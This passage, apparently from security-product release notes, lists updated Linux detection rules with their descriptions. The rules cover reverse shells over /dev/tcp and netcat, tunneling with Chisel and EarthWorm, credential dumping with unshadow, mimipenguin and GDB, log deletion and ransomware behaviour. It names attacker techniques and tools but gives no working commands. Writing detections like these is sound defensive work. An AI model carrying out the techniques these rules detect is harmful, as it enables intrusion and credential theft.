Adversaries may bring outdated drivers with vulnerabilities to gain code execution in kernel mode or abuse revoked certificates to sign their drivers. | new | 3 + +|<<prebuilt-rule-8-10-5-potential-non-standard-port-ssh-connection, Potential Non-Standard Port SSH connection>> | Identifies potentially malicious processes communicating via a port paring typically not associated with SSH. For example, SSH over port 2200 or port 2222 as opposed to the traditional port 22. Adversaries may make changes to the standard port a protocol uses to bypass filtering or muddle analysis/parsing of network data. | update | 5 + +|<<prebuilt-rule-8-10-5-security-software-discovery-via-grep, Security Software Discovery via Grep>> | Identifies the use of the grep command to discover known third-party macOS and Linux security tools, such as Antivirus or Host Firewall details. | update | 106 + +|<<prebuilt-rule-8-10-5-potential-reverse-shell-activity-via-terminal, Potential Reverse Shell Activity via Terminal>> | Identifies the execution of a shell process with suspicious arguments which may be indicative of reverse shell activity. | update | 106 + +|<<prebuilt-rule-8-10-5-suspicious-java-child-process, Suspicious JAVA Child Process>> | Identifies suspicious child processes of the Java interpreter process. This may indicate an attempt to execute a malicious JAR file or an exploitation attempt via a JAVA specific vulnerability. | update | 205 + +|<<prebuilt-rule-8-10-5-hosts-file-modified, Hosts File Modified>> | The hosts file on endpoints is used to control manual IP address to hostname resolutions. The hosts file is the first point of lookup for DNS hostname resolution so if adversaries can modify the endpoint hosts file, they can route traffic to malicious infrastructure. This rule detects modifications to the hosts file on Microsoft Windows, Linux (Ubuntu or RHEL) and macOS systems. | update | 106 + +|<<prebuilt-rule-8-10-5-modification-of-standard-authentication-module-or-configuration, Modification of Standard Authentication Module or Configuration>> | Adversaries may modify the standard authentication module for persistence via patching the normal authorization process or modifying the login configuration to allow unauthorized access or elevate privileges. | update | 204 + +|<<prebuilt-rule-8-10-5-bash-shell-profile-modification, Bash Shell Profile Modification>> | Both ~/.bash_profile and ~/.bashrc are files containing shell commands that are run when Bash is invoked. These files are executed in a user's context, either interactively or non-interactively, when a user logs in so that their environment is set correctly. Adversaries may abuse this to establish persistence by executing malicious content triggered by a user’s shell. | update | 104 + +|<<prebuilt-rule-8-10-5-ssh-authorized-keys-file-modification, SSH Authorized Keys File Modification>> | The Secure Shell (SSH) authorized_keys file specifies which users are allowed to log into a server using public key authentication. Adversaries may modify it to maintain persistence on a victim host by adding their own public key(s). | update | 204 + +|<<prebuilt-rule-8-10-5-sudoers-file-modification, Sudoers File Modification>> | A sudoers file specifies the commands that users or groups can run and from which terminals. Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. | update | 203 + +|<<prebuilt-rule-8-10-5-network-activity-detected-via-cat, Network Activity Detected via cat>> | This rule monitors for the execution of the cat command, followed by a connection attempt by the same process. Cat is capable of transfering data via tcp/udp channels by redirecting its read output to a /dev/tcp or /dev/udp channel. This activity is highly suspicious, and should be investigated. Attackers may leverage this capability to transfer tools or files to another host in the network or exfiltrate data while attempting to evade detection in the process. | update | 2 + +|<<prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-client, Potential Protocol Tunneling via Chisel Client>> | This rule monitors for common command line flags leveraged by the Chisel client utility followed by a connection attempt. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems. | update | 2 + +|<<prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-server, Potential Protocol Tunneling via Chisel Server>> | This rule monitors for common command line flags leveraged by the Chisel server utility followed by a received connection within a timespan of 1 minute. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems. | update | 2 + +|<<prebuilt-rule-8-10-5-suspicious-utility-launched-via-proxychains, Suspicious Utility Launched via ProxyChains>> | This rule monitors for the execution of suspicious linux tools through ProxyChains. ProxyChains is a command-line tool that enables the routing of network connections through intermediary proxies, enhancing anonymity and enabling access to restricted resources. Attackers can exploit the ProxyChains utility to hide their true source IP address, evade detection, and perform malicious activities through a chain of proxy servers, potentially masking their identity and intentions. | update | 2 + +|<<prebuilt-rule-8-10-5-potential-linux-tunneling-and-or-port-forwarding, Potential Linux Tunneling and/or Port Forwarding>> | This rule monitors for a set of Linux utilities that can be used for tunneling and port forwarding. Attackers can leverage tunneling and port forwarding techniques to bypass network defenses, establish hidden communication channels, and gain unauthorized access to internal resources, facilitating data exfiltration, lateral movement, and remote control. | update | 2 + +|<<prebuilt-rule-8-10-5-suspicious-network-activity-to-the-internet-by-previously-unknown-executable, Suspicious Network Activity to the Internet by Previously Unknown Executable>> | This rule monitors for network connectivity to the internet from a previously unknown executable located in a suspicious directory to a previously unknown destination ip. An alert from this rule can indicate the presence of potentially malicious activity, such as the execution of unauthorized or suspicious processes attempting to establish connections to unknown or suspicious destinations such as a command and control server. Detecting and investigating such behavior can help identify and mitigate potential security threats, protecting the system and its data from potential compromise. | update | 4 + +|<<prebuilt-rule-8-10-5-potential-protocol-tunneling-via-earthworm, Potential Protocol Tunneling via EarthWorm>> | Identifies the execution of the EarthWorm tunneler. Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection and network filtering, or to enable access to otherwise unreachable systems. | update | 107 + +|<<prebuilt-rule-8-10-5-sensitive-files-compression, Sensitive Files Compression>> | Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations. | update | 206 + +|<<prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-unshadow, Potential Linux Credential Dumping via Unshadow>> | Identifies the execution of the unshadow utility which is part of John the Ripper, a password-cracking tool on the host machine. Malicious actors can use the utility to retrieve the combined contents of the '/etc/shadow' and '/etc/password' files. Using the combined file generated from the utility, the malicious threat actors can use them as input for password-cracking utilities or prepare themselves for future operations by gathering credential information of the victim. | update | 5 + +|<<prebuilt-rule-8-10-5-linux-init-pid-1-secret-dump-via-gdb, Linux init (PID 1) Secret Dump via GDB>> | This rule monitors for the potential memory dump of the init process (PID 1) through gdb. Attackers may leverage memory dumping techniques to attempt secret extraction from privileged processes. Tools that display this behavior include "truffleproc" and "bash-memory-dump". This behavior should not happen by default, and should be investigated thoroughly. | update | 2 + +|<<prebuilt-rule-8-10-5-potential-linux-local-account-brute-force-detected, Potential Linux Local Account Brute Force Detected>> | Identifies multiple consecutive login attempts executed by one process targeting a local linux user account within a short time interval. Adversaries might brute force login attempts across different users with a default wordlist or a set of customly crafted passwords in an attempt to gain access to these accounts. | update | 3 + +|<<prebuilt-rule-8-10-5-potential-external-linux-ssh-brute-force-detected, Potential External Linux SSH Brute Force Detected>> | Identifies multiple external consecutive login failures targeting a user account from the same source address within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts. | update | 4 + +|<<prebuilt-rule-8-10-5-potential-internal-linux-ssh-brute-force-detected, Potential Internal Linux SSH Brute Force Detected>> | Identifies multiple internal consecutive login failures targeting a user account from the same source address within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts. | update | 8 + +|<<prebuilt-rule-8-10-5-potential-successful-linux-ftp-brute-force-attack-detected, Potential Successful Linux FTP Brute Force Attack Detected>> | An FTP (file transfer protocol) brute force attack is a method where an attacker systematically tries different combinations of usernames and passwords to gain unauthorized access to an FTP server, and if successful, the impact can include unauthorized data access, manipulation, or theft, compromising the security and integrity of the server and potentially exposing sensitive information. This rule identifies multiple consecutive authentication failures targeting a specific user account from the same source address and within a short time interval, followed by a successful authentication. | update | 3 + +|<<prebuilt-rule-8-10-5-potential-successful-linux-rdp-brute-force-attack-detected, Potential Successful Linux RDP Brute Force Attack Detected>> | An RDP (Remote Desktop Protocol) brute force attack involves an attacker repeatedly attempting various username and password combinations to gain unauthorized access to a remote computer via RDP, and if successful, the potential impact can include unauthorized control over the compromised system, data theft, or the ability to launch further attacks within the network, jeopardizing the security and confidentiality of the targeted system and potentially compromising the entire network infrastructure. This rule identifies multiple consecutive authentication failures targeting a specific user account within a short time interval, followed by a successful authentication. | update | 3 + +|<<prebuilt-rule-8-10-5-potential-successful-ssh-brute-force-attack, Potential Successful SSH Brute Force Attack>> | Identifies multiple SSH login failures followed by a successful one from the same source address. Adversaries can attempt to login into multiple users with a common or known password to gain access to accounts. | update | 8 + +|<<prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-proc-filesystem, Potential Linux Credential Dumping via Proc Filesystem>> | Identifies the execution of the mimipenguin exploit script which is linux adaptation of Windows tool mimikatz. Mimipenguin exploit script is used to dump clear text passwords from a currently logged-in user. The tool exploits a known vulnerability CVE-2018-20781. Malicious actors can exploit the cleartext credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. | update | 4 + +|<<prebuilt-rule-8-10-5-potential-openssh-backdoor-logging-activity, Potential OpenSSH Backdoor Logging Activity>> | Identifies a Secure Shell (SSH) client or server process creating or writing to a known SSH backdoor log file. Adversaries may modify SSH related binaries for persistence or credential access via patching sensitive functions to enable unauthorized access or to log SSH credentials for exfiltration. | update | 107 + +|<<prebuilt-rule-8-10-5-attempt-to-disable-iptables-or-firewall, Attempt to Disable IPTables or Firewall>> | Adversaries may attempt to disable the iptables or firewall service in an attempt to affect how a host is allowed to receive or send network traffic. | update | 4 + +|<<prebuilt-rule-8-10-5-attempt-to-disable-syslog-service, Attempt to Disable Syslog Service>> | Adversaries may attempt to disable the syslog service in an attempt to an attempt to disrupt event logging and evade detection by security controls. | update | 107 + +|<<prebuilt-rule-8-10-5-base16-or-base32-encoding-decoding-activity, Base16 or Base32 Encoding/Decoding Activity>> | Adversaries may encode/decode data in an attempt to evade detection by host- or network-based security controls. | update | 106 + +|<<prebuilt-rule-8-10-5-system-binary-copied-and-or-moved-to-suspicious-directory, System Binary Copied and/or Moved to Suspicious Directory>> | This rule monitors for the copying or moving of a system binary to a suspicious directory. Adversaries may copy/move and rename system binaries to evade detection. Copying a system binary to a different location should not occur often, so if it does, the activity should be investigated. | update | 2 + +|<<prebuilt-rule-8-10-5-file-made-immutable-by-chattr, File made Immutable by Chattr>> | Detects a file being made immutable using the chattr binary. Making a file immutable means it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata can not be modified, and the file can not be opened in write mode. Threat actors will commonly utilize this to prevent tampering or modification of their malicious files or any system files they have modified for purposes of persistence (e.g .ssh, /etc/passwd, etc.). | update | 108 + +|<<prebuilt-rule-8-10-5-potential-disabling-of-apparmor, Potential Disabling of AppArmor>> | This rule monitors for potential attempts to disable AppArmor. AppArmor is a Linux security module that enforces fine-grained access control policies to restrict the actions and resources that specific applications and processes can access. Adversaries may disable security tools to avoid possible detection of their tools and activities. | update | 2 + +|<<prebuilt-rule-8-10-5-potential-disabling-of-selinux, Potential Disabling of SELinux>> | Identifies potential attempts to disable Security-Enhanced Linux (SELinux), which is a Linux kernel security feature to support access control policies. Adversaries may disable security tools to avoid possible detection of their tools and activities. | update | 106 + +|<<prebuilt-rule-8-10-5-esxi-timestomping-using-touch-command, ESXI Timestomping using Touch Command>> | Identifies instances where the 'touch' command is executed on a Linux system with the "-r" flag, which is used to modify the timestamp of a file based on another file's timestamp. The rule targets specific VM-related paths, such as "/etc/vmware/", "/usr/lib/vmware/", or "/vmfs/*". These paths are associated with VMware virtualization software, and their presence in the touch command arguments may indicate that a threat actor is attempting to tamper with timestamps of VM-related files and configurations on the system. | update | 4 + +|<<prebuilt-rule-8-10-5-file-deletion-via-shred, File Deletion via Shred>> | Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process. | update | 106 + +|<<prebuilt-rule-8-10-5-file-permission-modification-in-writable-directory, File Permission Modification in Writable Directory>> | Identifies file permission modifications in common writable directories by a non-root user. Adversaries often drop files or payloads into a writable directory and change permissions prior to execution. | update | 206 + +|<<prebuilt-rule-8-10-5-creation-of-hidden-files-and-directories-via-commandline, Creation of Hidden Files and Directories via CommandLine>> | Users can mark specific files as hidden simply by putting a "." as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion. This rule looks for hidden files or folders in common writable directories. | update | 106 + +|<<prebuilt-rule-8-10-5-creation-of-hidden-shared-object-file, Creation of Hidden Shared Object File>> | Identifies the creation of a hidden shared object (.so) file. Users can mark specific files as hidden simply by putting a "." as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion. | update | 107 + +|<<prebuilt-rule-8-10-5-kernel-module-removal, Kernel Module Removal>> | Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module. | update | 106 + +|<<prebuilt-rule-8-10-5-system-log-file-deletion, System Log File Deletion>> | Identifies the deletion of sensitive Linux system logs. This may indicate an attempt to evade detection or destroy forensic evidence on a system. | update | 108 + +|<<prebuilt-rule-8-10-5-potential-hidden-process-via-mount-hidepid, Potential Hidden Process via Mount Hidepid>> | Identifies the execution of mount process with hidepid parameter, which can make processes invisible to other users from the system. Adversaries using Linux kernel version 3.2+ (or RHEL/CentOS v6.5+ above) can hide the process from other users. When hidepid=2 option is executed to mount the /proc filesystem, only the root user can see all processes and the logged-in user can only see their own process. This provides a defense evasion mechanism for the adversaries to hide their process executions from all other commands such as ps, top, pgrep and more. With the Linux kernel hardening hidepid option all the user has to do is remount the /proc filesystem with the option, which can now be monitored and detected. | update | 4 + +|<<prebuilt-rule-8-10-5-potential-defense-evasion-via-proot, Potential Defense Evasion via PRoot>> | Identifies the execution of the PRoot utility, an open-source tool for user-space implementation of chroot, mount --bind, and binfmt_misc. Adversaries can leverage an open-source tool PRoot to expand the scope of their operations to multiple Linux distributions and simplify their necessary efforts. In a normal threat scenario, the scope of an attack is limited by the varying configurations of each Linux distribution. With PRoot, it provides an attacker with a consistent operational environment across different Linux distributions, such as Ubuntu, Fedora, and Alpine. PRoot also provides emulation capabilities that allow for malware built on other architectures, such as ARM, to be run.The post-exploitation technique called bring your own filesystem (BYOF), can be used by the threat actors to execute malicious payload or elevate privileges or perform network scans or orchestrate another attack on the environment. Although PRoot was originally not developed with malicious intent it can be easily tuned to work for one. | update | 4 + +|<<prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-files, Suspicious Renaming of ESXI Files>> | Identifies instances where VMware-related files, such as those with extensions like ".vmdk", ".vmx", ".vmxf", ".vmsd", ".vmsn", ".vswp", ".vmss", ".nvram", and ".vmem", are renamed on a Linux system. The rule monitors for the "rename" event action associated with these file types, which could indicate malicious activity. | update | 4 + +|<<prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-index-html-file, Suspicious Renaming of ESXI index.html File>> | Identifies instances where the "index.html" file within the "/usr/lib/vmware/*" directory is renamed on a Linux system. The rule monitors for the "rename" event action associated with this specific file and path, which could indicate malicious activity. | update | 4 + +|<<prebuilt-rule-8-10-5-esxi-discovery-via-find, ESXI Discovery via Find>> | Identifies instances where the 'find' command is started on a Linux system with arguments targeting specific VM-related paths, such as "/etc/vmware/", "/usr/lib/vmware/", or "/vmfs/*". These paths are associated with VMware virtualization software, and their presence in the find command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM-related files and configurations on the system. | update | 4 + +|<<prebuilt-rule-8-10-5-esxi-discovery-via-grep, ESXI Discovery via Grep>> | Identifies instances where a process named 'grep', 'egrep', or 'pgrep' is started on a Linux system with arguments related to virtual machine (VM) files, such as "vmdk", "vmx", "vmxf", "vmsd", "vmsn", "vswp", "vmss", "nvram", or "vmem". These file extensions are associated with VM-related file formats, and their presence in grep command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM files on the system. | update | 4 + +|<<prebuilt-rule-8-10-5-enumeration-of-kernel-modules, Enumeration of Kernel Modules>> | Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This identifies attempts to enumerate information about a kernel module. | update | 206 + +|<<prebuilt-rule-8-10-5-hping-process-activity, Hping Process Activity>> | Hping ran on a Linux host. Hping is a FOSS command-line packet analyzer and has the ability to construct network packets for a wide variety of network security testing applications, including scanning and firewall auditing. | update | 106 + +|<<prebuilt-rule-8-10-5-nping-process-activity, Nping Process Activity>> | Nping ran on a Linux host. Nping is part of the Nmap tool suite and has the ability to construct raw packets for a wide variety of security testing applications, including denial of service testing. | update | 106 + +|<<prebuilt-rule-8-10-5-potential-pspy-process-monitoring-detected, Potential Pspy Process Monitoring Detected>> | This rule leverages auditd to monitor for processes scanning different processes within the /proc directory using the openat syscall. This is a strong indication for the usage of the pspy utility. Attackers may leverage the pspy process monitoring utility to monitor system processes without requiring root permissions, in order to find potential privilege escalation vectors. | update | 3 + +|<<prebuilt-rule-8-10-5-sudo-command-enumeration-detected, Sudo Command Enumeration Detected>> | This rule monitors for the usage of the sudo -l command, which is used to list the allowed and forbidden commands for the invoking user. Attackers may execute this command to enumerate commands allowed to be executed with sudo permissions, potentially allowing to escalate privileges to root. | update | 3 + +|<<prebuilt-rule-8-10-5-suid-sguid-enumeration-detected, SUID/SGUID Enumeration Detected>> | This rule monitors for the usage of the "find" command in conjunction with SUID and SGUID permission arguments. SUID (Set User ID) and SGID (Set Group ID) are special permissions in Linux that allow a program to execute with the privileges of the file owner or group, respectively, rather than the privileges of the user running the program. In case an attacker is able to enumerate and find a binary that is misconfigured, they might be able to leverage this misconfiguration to escalate privileges by exploiting vulnerabilities or built-in features in the privileged program. | update | 3 + +|<<prebuilt-rule-8-10-5-unusual-user-privilege-enumeration-via-id, Unusual User Privilege Enumeration via id>> | This rule monitors for a sequence of 20 "id" command executions within 1 second by the same parent process. This behavior is unusual, and may be indicative of the execution of an enumeration script such as LinPEAS or LinEnum. These scripts leverage the "id" command to enumerate the privileges of all users present on the system. | update | 2 + +|<<prebuilt-rule-8-10-5-virtual-machine-fingerprinting, Virtual Machine Fingerprinting>> | An adversary may attempt to get detailed information about the operating system and hardware. This rule identifies common locations used to discover virtual machine hardware by a non-root user. This technique has been used by the Pupy RAT and other malware. | update | 106 + +|<<prebuilt-rule-8-10-5-abnormal-process-id-or-lock-file-created, Abnormal Process ID or Lock File Created>> | Identifies the creation of a Process ID (PID), lock or reboot file created in temporary file storage paradigm (tmpfs) directory /var/run. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files. | update | 210 + +|<<prebuilt-rule-8-10-5-potential-curl-cve-2023-38545-exploitation, Potential curl CVE-2023-38545 Exploitation>> | Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version <= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version >= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule. | update | 2 + +|<<prebuilt-rule-8-10-5-file-creation-execution-and-self-deletion-in-suspicious-directory, File Creation, Execution and Self-Deletion in Suspicious Directory>> | This rule monitors for the creation of a file, followed by its execution and self-deletion in a short timespan within a directory often used for malicious purposes by threat actors. This behavior is often used by malware to execute malicious code and delete itself to hide its tracks. | update | 2 + +|<<prebuilt-rule-8-10-5-file-transfer-or-listener-established-via-netcat, File Transfer or Listener Established via Netcat>> | A netcat process is engaging in network activity on a Linux host. Netcat is often used as a persistence mechanism by exporting a reverse shell or by serving a shell on a listening port. Netcat is also sometimes used for data exfiltration. | update | 108 + +|<<prebuilt-rule-8-10-5-network-connection-via-recently-compiled-executable, Network Connection via Recently Compiled Executable>> | This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent network connection event. This behavior can indicate the set up of a reverse tcp connection to a command-and-control server. Attackers may spawn reverse shells to establish persistence onto a target system. | update | 2 + +|<<prebuilt-rule-8-10-5-interactive-terminal-spawned-via-perl, Interactive Terminal Spawned via Perl>> | Identifies when a terminal (tty) is spawned via Perl. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host. | update | 106 + +|<<prebuilt-rule-8-10-5-process-started-from-process-id-pid-file, Process Started from Process ID (PID) File>> | Identifies a new process starting from a process ID (PID), lock or reboot file within the temporary file storage paradigm (tmpfs) directory /var/run directory. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files. | update | 107 + +|<<prebuilt-rule-8-10-5-binary-executed-from-shared-memory-directory, Binary Executed from Shared Memory Directory>> | Identifies the execution of a binary by root in Linux shared memory directories: (/dev/shm/, /run/shm/, /var/run/, /var/lock/). This activity is to be considered highly abnormal and should be investigated. Threat actors have placed executables used for persistence on high-uptime servers in these directories as system backdoors. | update | 107 + +|<<prebuilt-rule-8-10-5-interactive-terminal-spawned-via-python, Interactive Terminal Spawned via Python>> | Identifies when a terminal (tty) is spawned via Python. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host. | update | 108 + +|<<prebuilt-rule-8-10-5-potential-code-execution-via-postgresql, Potential Code Execution via Postgresql>> | This rule monitors for suspicious activities that may indicate an attacker attempting to execute arbitrary code within a PostgreSQL environment. Attackers can execute code via PostgreSQL as a result of gaining unauthorized access to a public facing PostgreSQL database or exploiting vulnerabilities, such as remote command execution and SQL injection attacks, which can result in unauthorized access and malicious actions, and facilitate post-exploitation activities for unauthorized access and malicious actions. | update | 4 + +|<<prebuilt-rule-8-10-5-linux-restricted-shell-breakout-via-linux-binary-s, Linux Restricted Shell Breakout via Linux Binary(s)>> | Identifies the abuse of a Linux binary to break out of a restricted shell or environment by spawning an interactive system shell. The activity of spawning a shell from a binary is not common behavior for a user or system administrator, and may indicate an attempt to evade detection, increase capabilities or enhance the stability of an adversary. | update | 110 + +|<<prebuilt-rule-8-10-5-deprecated-potential-reverse-shell-via-suspicious-parent-process, Deprecated - Potential Reverse Shell via Suspicious Parent Process>> | This detection rule detects the creation of a shell through a suspicious parent child relationship. Any reverse shells spawned by the specified utilities that use a forked process to initialize the connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system. | update | 5 + +|<<prebuilt-rule-8-10-5-potential-reverse-shell-via-background-process, Potential Reverse Shell via Background Process>> | Monitors for the execution of background processes with process arguments capable of opening a socket in the /dev/tcp channel. This may indicate the creation of a backdoor reverse connection, and should be investigated further. | update | 2 + +|<<prebuilt-rule-8-10-5-potential-reverse-shell-via-java, Potential Reverse Shell via Java>> | This detection rule identifies the execution of a Linux shell process from a Java JAR application post an incoming network connection. This behavior may indicate reverse shell activity via a Java application. | update | 4 + +|<<prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-child-process, Potential Reverse Shell via Suspicious Child Process>> | This detection rule detects the creation of a shell through a suspicious process chain. Any reverse shells spawned by the specified utilities that are initialized from a single process followed by a network connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system. | update | 5 + +|<<prebuilt-rule-8-10-5-potential-meterpreter-reverse-shell, Potential Meterpreter Reverse Shell>> | This detection rule identifies a sample of suspicious Linux system file reads used for system fingerprinting, leveraged by the Metasploit Meterpreter shell to gather information about the target that it is executing its shell on. Detecting this pattern is indicative of a successful meterpreter shell connection. | update | 2 + +|<<prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-binary, Potential Reverse Shell via Suspicious Binary>> | This detection rule detects the creation of a shell through a chain consisting of the execution of a suspicious binary (located in a commonly abused location or executed manually) followed by a network event and ending with a shell being spawned. Stageless reverse tcp shells display this behaviour. Attackers may spawn reverse shells to establish persistence onto a target system. | update | 5 + +|<<prebuilt-rule-8-10-5-potential-reverse-shell, Potential Reverse Shell>> | This detection rule identifies suspicious network traffic patterns associated with TCP reverse shell activity. This activity consists of a parent-child relationship where a network event is followed by the creation of a shell process. An attacker may establish a Linux TCP reverse shell to gain remote access to a target system. | update | 5 + +|<<prebuilt-rule-8-10-5-potential-reverse-shell-via-udp, Potential Reverse Shell via UDP>> | This detection rule identifies suspicious network traffic patterns associated with UDP reverse shell activity. This activity consists of a sample of an execve, socket and connect syscall executed by the same process, where the auditd.data.a0-1 indicate a UDP connection, ending with an egress connection event. An attacker may establish a Linux UDP reverse shell to bypass traditional firewall restrictions and gain remote access to a target system covertly. | update | 2 + +|<<prebuilt-rule-8-10-5-suspicious-content-extracted-or-decompressed-via-funzip, Suspicious Content Extracted or Decompressed via Funzip>> | Identifies when suspicious content is extracted from a file and subsequently decompressed using the funzip utility. Malware may execute the tail utility using the "-c" option to read a sequence of bytes from the end of a file. The output from tail can be piped to funzip in order to decompress malicious code before it is executed. This behavior is consistent with malware families such as Bundlore. | update | 3 + +|<<prebuilt-rule-8-10-5-suspicious-system-commands-executed-by-previously-unknown-executable, Suspicious System Commands Executed by Previously Unknown Executable>> | This rule monitors for the execution of several commonly used system commands executed by a previously unknown executable located in commonly abused directories. An alert from this rule can indicate the presence of potentially malicious activity, such as the execution of unauthorized or suspicious processes attempting to run malicious code. Detecting and investigating such behavior can help identify and mitigate potential security threats, protecting the system and its data from potential compromise. | update | 103 + +|<<prebuilt-rule-8-10-5-suspicious-mining-process-creation-event, Suspicious Mining Process Creation Event>> | Identifies service creation events of common mining services, possibly indicating the infection of a system with a cryptominer. | update | 4 + +|<<prebuilt-rule-8-10-5-bpf-filter-applied-using-tc, BPF filter applied using TC>> | Detects when the tc (transmission control) binary is utilized to set a BPF (Berkeley Packet Filter) on a network interface. Tc is used to configure Traffic Control in the Linux kernel. It can shape, schedule, police and drop traffic. A threat actor can utilize tc to set a bpf filter on an interface for the purpose of manipulating the incoming traffic. This technique is not at all common and should indicate abnormal, suspicious or malicious activity. | update | 106 + +|<<prebuilt-rule-8-10-5-suspicious-data-encryption-via-openssl-utility, Suspicious Data Encryption via OpenSSL Utility>> | Identifies when the openssl command-line utility is used to encrypt multiple files on a host within a short time window. Adversaries may encrypt data on a single or multiple systems in order to disrupt the availability of their target's data and may attempt to hold the organization's data to ransom for the purposes of extortion. | update | 3 + +|<<prebuilt-rule-8-10-5-suspicious-termination-of-esxi-process, Suspicious Termination of ESXI Process>> | Identifies instances where VMware processes, such as "vmware-vmx" or "vmx," are terminated on a Linux system by a "kill" command. The rule monitors for the "end" event type, which signifies the termination of a process. The presence of a "kill" command as the parent process for terminating VMware processes may indicate that a threat actor is attempting to interfere with the virtualized environment on the targeted system. | update | 4 + +|<<prebuilt-rule-8-10-5-suspicious-file-changes-activity-detected, Suspicious File Changes Activity Detected>> | This rule identifies a sequence of 100 file extension rename events within a set of common file paths by the same process in a timespan of 1 second. Ransomware is a type of malware that encrypts a victim's files or systems and demands payment (usually in cryptocurrency) in exchange for the decryption key. One important indicator of a ransomware attack is the mass encryption of the file system, after which a new file extension is added to the file. | update | 6 + +|<<prebuilt-rule-8-10-5-potential-linux-ransomware-note-creation-detected, Potential Linux Ransomware Note Creation Detected>> | This rule identifies a sequence of a mass file encryption event in conjunction with the creation of a .txt file with a file name containing ransomware keywords executed by the same process in a 1 second timespan. Ransomware is a type of malware that encrypts a victim's files or systems and demands payment (usually in cryptocurrency) in exchange for the decryption key. One important indicator of a ransomware attack is the mass encryption of the file system, after which a new file extension is added to the file. | update | 6 + +|<<prebuilt-rule-8-10-5-high-number-of-process-terminations, High Number of Process Terminations>> | This rule identifies a high number (10) of process terminations via pkill from the same host within a short time period. | update | 109 + +|<<prebuilt-rule-8-10-5-connection-to-external-network-via-telnet, Connection to External Network via Telnet>> | Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to publicly routable IP addresses. | update | 105 + +|<<prebuilt-rule-8-10-5-connection-to-internal-network-via-telnet, Connection to Internal Network via Telnet>> | Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to non-publicly routable IP addresses. | update | 105 + +|<<prebuilt-rule-8-10-5-chkconfig-service-add, Chkconfig Service Add>> | Detects the use of the chkconfig binary to manually add a service for management by chkconfig. Threat actors may utilize this technique to maintain persistence on a system. When a new service is added, chkconfig ensures that the service has either a start or a kill entry in every runlevel and when the system is rebooted the service file added will run providing long-term persistence. | update | 107 + +|<<prebuilt-rule-8-10-5-modification-of-openssh-binaries, Modification of OpenSSH Binaries>> | Adversaries may modify SSH related binaries for persistence or credential access by patching sensitive functions to enable unauthorized access or by logging SSH credentials for exfiltration. | update | 106 + +|<<prebuilt-rule-8-10-5-cron-job-created-or-changed-by-previously-unknown-process, Cron Job Created or Changed by Previously Unknown Process>> | Linux cron jobs are scheduled tasks that can be leveraged by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities. | update | 5 + +|<<prebuilt-rule-8-10-5-dynamic-linker-copy, Dynamic Linker Copy>> | Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious. | update | 105 + +|<<prebuilt-rule-8-10-5-suspicious-file-creation-in-etc-for-persistence, Suspicious File Creation in /etc for Persistence>> | Detects the manual creation of files in specific etc directories, via user root, used by Linux malware to persist and elevate privileges on compromised systems. File creation in these directories should not be entirely common and could indicate a malicious binary or script installing persistence mechanisms for long term access. | update | 109 + +|<<prebuilt-rule-8-10-5-potential-persistence-through-init-d-detected, Potential Persistence Through init.d Detected>> | Files that are placed in the /etc/init.d/ directory in Unix can be used to start custom applications, services, scripts or commands during start-up. Init.d has been mostly replaced in favor of Systemd. However, the "systemd-sysv-generator" can convert init.d files to 